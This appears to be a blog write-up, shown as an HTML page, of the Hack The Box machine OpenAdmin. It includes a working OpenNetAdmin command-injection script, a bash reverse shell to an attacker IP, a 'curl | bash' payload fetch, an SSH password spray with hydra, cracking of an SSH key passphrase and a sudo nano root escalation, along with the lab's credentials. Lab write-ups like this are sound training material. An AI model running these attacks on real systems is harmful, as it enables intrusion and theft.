<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Hack The Box - OpenAdmin Writeup | Chr0x6eOs - Blog</title>
<meta name="generator" content="Jekyll v3.8.5" />
<meta property="og:title" content="Hack The Box - OpenAdmin Writeup" />
<meta name="author" content="Chr0x6eOs" />
<meta property="og:locale" content="en" />
<meta name="description" content="Overview" />
<meta property="og:description" content="Overview" />
<link rel="canonical" href="http://localhost:4000/2020/04/02/htb-OpenAdmin.html" />
<meta property="og:url" content="http://localhost:4000/2020/04/02/htb-OpenAdmin.html" />
<meta property="og:site_name" content="Chr0x6eOs - Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-04-02T00:00:00+02:00" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2020/04/02/htb-OpenAdmin.html"},"@type":"BlogPosting","dateModified":"2020-04-02T00:00:00+02:00","url":"http://localhost:4000/2020/04/02/htb-OpenAdmin.html","author":{"@type":"Person","name":"Chr0x6eOs"},"headline":"Hack The Box - OpenAdmin Writeup","description":"Overview","datePublished":"2020-04-02T00:00:00+02:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Chr0x6eOs - Blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Chr0x6eOs - Blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Hack The Box - OpenAdmin Writeup</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2020-04-02T00:00:00+02:00" itemprop="datePublished">Apr 2, 2020
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">Chr0x6eOs</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h1 id="overview">Overview</h1>
<p><img src="/assets/htb/OpenAdmin/openadmin.png" alt="OpenAdmin Image" /></p>

<p><a href="https://www.hackthebox.eu/home/machines/profile/222">OpenAdmin</a> is an easy linux box by <a href="https://www.hackthebox.eu/home/users/profile/82600">dmw0ng</a>.</p>

<p>The box starts with web-enumeration, which reveals an old version of the software OpenNetAdmin. This version is vulnerable to a remote-code-execution exploit. This gives us code-execution in the context of the user www-data. After finding a clear-text password in the config file OpenNetAdmin, we can login via ssh. Checking the listening ports, an internal website is revealed. The website is protected with a login, however the password is hardcoded. Logging in to the website reveals a password-protected SSH-key. After cracking the passphrase for the ssh-key we can login and read user.txt.
In order to get root we have to abuse sudo privileges for the nano binary.</p>

<h1 id="information-gathering">Information Gathering</h1>

<h2 id="nmap">Nmap</h2>
<p>We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> 10.10.10.171
<span class="go">Nmap scan report for 10.10.10.171
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
</span><span class="gp">22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey:
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp filtered http
</span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>

<h1 id="enumeration">Enumeration</h1>
<p>The only two open ports shown are <strong>22</strong> and <strong>80</strong>. SSH usually is not that interesting, so let’s begin with http.</p>

<h2 id="http---port-80">HTTP - Port 80</h2>
<p>Going to https://10.10.10.171 we the default apache2 page is shown. To further enumerate the website, we’ll start a gobuster.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.10.10.171 <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="go">===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.171
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/02 14:01:26 Starting gobuster
===============================================================
/music (Status: 301)
</span></code></pre></div></div>
<p>Immediately after starting the gobuster we get a result returned.
Going to /music this webpage is shown:</p>

<p><img src="/assets/htb/OpenAdmin/webpage-music.png" alt="/music webpage" />
Checking out the links, Login directs to http://10.10.10.171/ona:</p>

<p><img src="/assets/htb/OpenAdmin/webpage-ona.png" alt="OpenAdmin webpage" />
The website title suggests, that this website is running a software called “OpenNetAdmin”. Furthermore, there is an alert, telling us, that the current version of this website (v18.1.1) is out of date.</p>

<h1 id="initial-shell---exploiting-opennetadmin">Initial Shell - Exploiting OpenNetAdmin</h1>
<h2 id="finding-rce-exploit">Finding RCE exploit</h2>
<p>Running searchsploit a RCE (remote code execution) vulnerability is revealed:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>searchsploit <span class="s2">"OpenNetAdmin"</span>
<span class="go">----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                 | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                  | exploits/php/webapps/47691.sh
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</span></code></pre></div></div>
<p>The last exploit seems to match the version of the current deployed OpenNetAdmin, so we’ll check this one out first.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>rce.sh
<span class="gp">#</span><span class="o">!</span>/bin/bash
<span class="go">
URL="http://10.10.10.171/ona/"
</span><span class="gp">while true;</span><span class="w">
</span><span class="go">do
</span><span class="gp">         echo -n "$</span><span class="w"> </span><span class="s2">"; read cmd
</span><span class="gp">         curl --silent -d "xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;</span><span class="w">
</span><span class="gp">         echo \"BEGIN\";</span><span class="k">${</span><span class="nv">cmd</span><span class="k">}</span><span class="s2">;echo </span><span class="se">\"</span><span class="s2">END</span><span class="se">\"</span><span class="s2">&amp;xajaxargs[]=ping"</span> <span class="s2">"</span><span class="k">${</span><span class="nv">URL</span><span class="k">}</span><span class="s2">"</span> |
<span class="go">         sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
</span></code></pre></div></div>
<p>Seems like there is a command injection in one of the post parameters.</p>

<h2 id="getting-a-shell-as-www-data">Getting a shell as www-data</h2>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>./rse.sh
<span class="gp">$</span><span class="w"> </span><span class="nb">whoami</span>
<span class="go">www-data
</span></code></pre></div></div>
<p>Running the exploit we can verify code-execution by issuing a simple “whoami”. Seems like we have code-execution in the context of the user “www-data”. Let’s get a shell next!</p>

<p>In order to evade bad characters and other issues, I am going to host the reverse shell with a python webserver and use the RCE to access and execute my payload.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>s.sh
<span class="gp">#</span><span class="o">!</span>/bin/bash
<span class="gp">bash -c 'bash -i &gt;</span>&amp; /dev/tcp/10.10.14.7/443 0&gt;&amp;1<span class="s1">'
</span></code></pre></div></div>
<p>This simple bash reverse-shell should do the trick.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>python3 <span class="nt">-m</span> http.server 80
<span class="go">Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
</span></code></pre></div></div>
<p>With the webserver up and running we now just need to access and execute the reverse-shell using the exploit.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>./rce.sh
<span class="gp">$</span><span class="w"> </span>which curl
<span class="go">/usr/bin/curl
</span><span class="gp">$</span><span class="w"> </span>curl 10.10.14.7/s.sh | bash
</code></pre></div></div>
<p>With curl being installed, we can simply access the shell and directly pipe it into bash to execute the reverse-shell.</p>

<p><code class="language-plaintext highlighter-rouge">10.10.10.171 - - [02/May/2020 14:36:59] "GET /s.sh HTTP/1.1" 200 -</code></p>

<p>The reverse-shell is being accessed from the python webserver.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>nc <span class="nt">-lvnp</span> 443
<span class="go">Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:39448.
bash: cannot set terminal process group (1049): Inappropriate ioctl for device
bash: no job control in this shell
</span><span class="gp">www-data@openadmin:/opt/ona/www$</span><span class="w">
</span></code></pre></div></div>
<p>We got the shell returned! Next up let’s enumerate the system.</p>

<h1 id="privesc">Privesc</h1>
<h2 id="enumeration-as-www-data">Enumeration as www-data</h2>
<p>After a bit of searching around, an interesting config file can be found at /opt/ona/www/local/config/database_settings.inc.php :</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>

<span class="nv">$ona_contexts</span><span class="o">=</span><span class="k">array</span> <span class="p">(</span>
  <span class="s1">'DEFAULT'</span> <span class="o">=&gt;</span>
  <span class="k">array</span> <span class="p">(</span>
    <span class="s1">'databases'</span> <span class="o">=&gt;</span>
    <span class="k">array</span> <span class="p">(</span>
      <span class="mi">0</span> <span class="o">=&gt;</span>
      <span class="k">array</span> <span class="p">(</span>
        <span class="s1">'db_type'</span> <span class="o">=&gt;</span> <span class="s1">'mysqli'</span><span class="p">,</span>
        <span class="s1">'db_host'</span> <span class="o">=&gt;</span> <span class="s1">'localhost'</span><span class="p">,</span>
        <span class="s1">'db_login'</span> <span class="o">=&gt;</span> <span class="s1">'ona_sys'</span><span class="p">,</span>
        <span class="s1">'db_passwd'</span> <span class="o">=&gt;</span> <span class="s1">'n1nj4W4rri0R!'</span><span class="p">,</span>
        <span class="s1">'db_database'</span> <span class="o">=&gt;</span> <span class="s1">'ona_default'</span><span class="p">,</span>
        <span class="s1">'db_debug'</span> <span class="o">=&gt;</span> <span class="kc">false</span><span class="p">,</span>
      <span class="p">),</span>
    <span class="p">),</span>
    <span class="s1">'description'</span> <span class="o">=&gt;</span> <span class="s1">'Default data context'</span><span class="p">,</span>
    <span class="s1">'context_color'</span> <span class="o">=&gt;</span> <span class="s1">'#D3DBFF'</span><span class="p">,</span>
  <span class="p">),</span>
<span class="p">);</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>
<p>Now having found a password, we need a user to login with.</p>

<p>Checking out /etc/passwd for possible users to log in to:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">www-data@openadmin:/opt/ona/www/local/config$</span><span class="w"> </span><span class="nb">cat</span> /etc/passwd | <span class="nb">grep</span> <span class="s2">"/bin/bash"</span>
<span class="go">root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
</span></code></pre></div></div>
<p>Seems like we have 3 possible users (actually 2, because root is rather unlikely) we can try to authenticate with the found password.</p>

<h2 id="privesc-to-jimmy">Privesc to jimmy</h2>
<p>Of course we could try to su with our current reverse-shell, however Port 22 is open, so let’s try SSH first. If this succeeds we get a much stabler shell and have some additional features like portforwarding or copying via scp.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>users.txt
<span class="go">root
jimmy
joanna
</span><span class="gp">root@silence:~#</span><span class="w"> </span>hydra <span class="nt">-L</span> users.txt <span class="nt">-p</span> <span class="s1">'n1nj4W4rri0R!'</span> ssh://10.10.10.171
<span class="go">[DATA] attacking ssh://10.10.10.171:22/
[22][ssh] host: 10.10.10.171   login: jimmy   password: n1nj4W4rri0R!
1 of 1 target successfully completed, 1 valid password found
</span></code></pre></div></div>
<p>Using hydra we can quickly evaluate if any of the users on the system are allowed to login with the found password. Jimmy seems to be allowed to login via ssh with the password ‘n1nj4W4rri0R!’.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
jimmy@10.10.10.171's password: n1nj4W4rri0R!

Last login: Thu Jan  2 20:50:03 2020 from 10.10.14.3
</span><span class="gp">jimmy@openadmin:~$</span><span class="w">
</span></code></pre></div></div>

<h2 id="privesc-to-joanna">Privesc to joanna</h2>
<p>As there was no user.txt found in the home directory of jimmy, the next step is to escalate privileges to joanna.</p>
<h3 id="enumerating-ports">Enumerating ports</h3>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">jimmy@openadmin:~$</span><span class="w"> </span>netstat <span class="nt">-alnp</span> | <span class="nb">grep</span> <span class="s2">"LISTEN "</span>
<span class="go">(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
</span></code></pre></div></div>
<p>Checking out all the ports listening on localhost only, the port <strong>52846</strong> stands out in particular.</p>

<p>We can simply verify what’s listening on the port, by connecting to it via nc and sending some junk data:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">jimmy@openadmin:~$</span><span class="w"> </span>nc 127.0.0.1 52846
<span class="go">Test
HTTP/1.1 400 Bad Request
Date: Sat, 02 May 2020 13:06:30 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 314
Connection: close
</span><span class="gp">Content-Type: text/html;</span><span class="w"> </span><span class="nv">charset</span><span class="o">=</span>iso-8859-1
<span class="go">
</span><span class="gp">&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;</span><span class="w">
</span><span class="gp">&lt;html&gt;</span>&lt;<span class="nb">head</span><span class="o">&gt;</span>
<span class="gp">&lt;title&gt;</span>400 Bad Request&lt;/title&gt;
<span class="gp">&lt;/head&gt;</span>&lt;body&gt;
<span class="gp">&lt;h1&gt;</span>Bad Request&lt;/h1&gt;
<span class="gp">&lt;p&gt;</span>Your browser sent a request that this server could not understand.&lt;br /&gt;
<span class="gp">&lt;/p&gt;</span><span class="w">
</span><span class="gp">&lt;hr&gt;</span><span class="w">
</span><span class="gp">&lt;address&gt;</span>Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span> Server at internal.openadmin.htb Port 80&lt;/address&gt;
<span class="gp">&lt;/body&gt;</span>&lt;/html&gt;
</code></pre></div></div>
<p>This response is really valuable, as it gives us a lot of information. We now know that on 52846 an Apache webserver is running and the hostname is <em>internal.openadmin.htb</em>.</p>

<p>As we have the possibility to login via SSH, we can portforward the http-traffic through the SSH-tunnel to the port and browse the page normally.</p>

<h3 id="portforwaring-via-ssh">Portforwaring via SSH</h3>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">ssh jimmy@10.10.10.171 -L 80:127.0.0.1:52846
jimmy@10.10.10.171's password: n1nj4W4rri0R!
</span><span class="gp">jimmy@openadmin:~$</span><span class="w">
</span></code></pre></div></div>
<p>We can verify the tunnel by checking our listening ports:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">netstat -alnp | grep "LISTEN "
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      23457/ssh
</span></code></pre></div></div>
<p>Seems like the tunnel is working! Let’s browse the website.</p>

<p><img src="/assets/htb/OpenAdmin/webpage-internal.png" alt="Internal webpage" /></p>

<p>The login is password-protected and the found credentials (jimmy:n1nj4W4rri0R!) do not work…
With a shell on the server, let’s check if we can access the source of this website.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">jimmy@openadmin:/var/www$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-alh</span>
<span class="go">total 16K
drwxr-xr-x  4 root     root     4.0K Nov 22 18:15 .
drwxr-xr-x 14 root     root     4.0K Nov 21 14:08 ..
drwxr-xr-x  6 www-data www-data 4.0K Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4.0K Nov 23 17:43 internal
</span><span class="gp">lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -&gt;</span><span class="w"> </span>/opt/ona/www
<span class="gp">jimmy@openadmin:/var/www$</span><span class="w"> </span><span class="nb">cd </span>internal
<span class="gp">jimmy@openadmin:/var/www/internal$</span><span class="w"> </span><span class="nb">ls</span>
<span class="go">index.php  logout.php  main.php
</span></code></pre></div></div>
<p>Seems like we can indeed access the source code to internal…
Checking out index.php:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;h2&gt;</span>Enter Username and Password<span class="nt">&lt;/h2&gt;</span>
      <span class="nt">&lt;div</span> <span class="na">class = </span><span class="s">"container form-signin"</span><span class="nt">&gt;</span>
        <span class="nt">&lt;h2</span> <span class="na">class=</span><span class="s">"featurette-heading"</span><span class="nt">&gt;</span>Login Restricted.<span class="nt">&lt;span</span> <span class="na">class=</span><span class="s">"text-muted"</span><span class="nt">&gt;&lt;/span&gt;&lt;/h2&gt;</span>
          <span class="cp">&lt;?php</span>
            <span class="nv">$msg</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
            <span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'login'</span><span class="p">])</span>
            <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span>
            <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]))</span>
            <span class="p">{</span>
              <span class="k">if</span> <span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'jimmy'</span>
              <span class="o">&amp;&amp;</span> <span class="nb">hash</span><span class="p">(</span><span class="s1">'sha512'</span><span class="p">,</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span> <span class="o">==</span> <span class="s1">'00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1'</span><span class="p">)</span>
              <span class="p">{</span>
                  <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'jimmy'</span><span class="p">;</span>
                  <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: /main.php"</span><span class="p">);</span>
              <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                  <span class="nv">$msg</span> <span class="o">=</span> <span class="s1">'Wrong username or password.'</span><span class="p">;</span>
              <span class="p">}</span>
            <span class="p">}</span>
         <span class="cp">?&gt;</span>
      <span class="nt">&lt;/div&gt;</span>
</code></pre></div></div>
<p>Seems like the password is hardcoded! Let’s use google and check if this hash is known…</p>

<p>The password is “Revealed”. It can be found <a href="https://md5hashing.net/hash/sha512/00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1">here</a>.</p>

<p>Using the creds (jimmy:Revealed) we can login successfully.</p>

<p><img src="/assets/htb/OpenAdmin/webpage-internal-main.png" alt="Internal main webpage" /></p>
<h3 id="cracking-ssh-private-key">Cracking SSH private key</h3>
<p>The RSA private key seems interesting, so we’ll save it to a file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@silence:~# cat joanna.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</code></pre></div></div>

<p>Using john we can extract and crack the hash of the rsa private-key:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>ssh2john joanna.key <span class="o">&gt;</span> joanna-key.hash
<span class="gp">root@silence:~#</span><span class="w"> </span>john joanna-key.hash <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
<span class="go">Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
bloodninjas      (joanna.key)
</span></code></pre></div></div>
<p>With the password for the SSH-key cracked we can finally login via SSH and hopefully get user.txt:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">ssh -i joanna.key joanna@10.10.10.171
Enter passphrase for key 'joanna.key': bloodninjas
Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
</span><span class="gp">joanna@openadmin:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt
<span class="go">c9b2c***************************
</span></code></pre></div></div>

<h2 id="privesc-to-root">Privesc to root</h2>
<p>Checking the sudo privileges of joanna we have our privilege escalation path:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">joanna@openadmin:~$</span><span class="w"> </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="go">Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
</span></code></pre></div></div>
<p>Checking out <a href="https://gtfobins.github.io/gtfobins/nano/#shell">GTFObins</a>, we have a quick way to get a shell as root.
<img src="/assets/htb/OpenAdmin/gtfobin-nano.png" alt="GTFObin nano" /></p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">joanna@openadmin:~$</span><span class="w"> </span><span class="nb">sudo </span>nano /opt/priv
</code></pre></div></div>

<p><img src="/assets/htb/OpenAdmin/privesc-nano1.png" alt="Privesc part 1" />
<img src="/assets/htb/OpenAdmin/privesc-nano2.png" alt="Privesc part 2" /></p>

<p>Now we can read root.txt:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span><span class="nb">cat </span>root.txt
<span class="go">2f907***************************
</span></code></pre></div></div>

  </div><a class="u-url" href="/2020/04/02/htb-OpenAdmin.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Chr0x6eOs - Blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Chr0x6eOs - Blog</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/chr0x6eos"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">chr0x6eos</span></a></li><li><a href="https://www.twitter.com/Chr0x6eOs"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">Chr0x6eOs</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Blog for HTB writeups and other security related stuff</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
